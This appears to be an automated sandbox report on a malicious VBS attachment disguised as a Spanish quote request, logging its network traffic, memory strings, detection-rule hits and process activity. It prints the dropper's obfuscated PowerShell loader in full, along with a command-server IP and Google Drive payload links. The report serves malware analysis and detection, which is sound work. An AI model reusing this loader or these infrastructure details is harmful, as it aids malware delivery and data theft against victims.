Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: unknown HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2609487387.0000000007735000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/10899
Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/10899x
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000008.00000002.1402272979.000001AB648C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1468130265.000001AB7B230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://w7icrosoft.com
Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google
Source: powershell.exe, 00000008.00000002.1402272979.000001AB62E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB64866000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000008.00000002.1402272979.000001AB62E58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJLP
Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJLXR
Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2620505003.00000000226F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f
Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f(
Source: powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh(
Source: powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007735000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download
Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1402272979.000001AB63F65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2

System Summary

barindex
Source: amsi32_7644.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC3AB276 8_2_00007FFAAC3AB276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC3AC022 8_2_00007FFAAC3AC022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAAC47A09A 8_2_00007FFAAC47A09A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_048AF340 11_2_048AF340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_048AFC10 11_2_048AFC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_048AEFF8 11_2_048AEFF8
Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7088
Source: unknown Process created: Commandline size = 7088
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7088 Jump to behavior
Source: amsi32_7644.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@30/10@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Tallowweed.Kli Jump to behavior
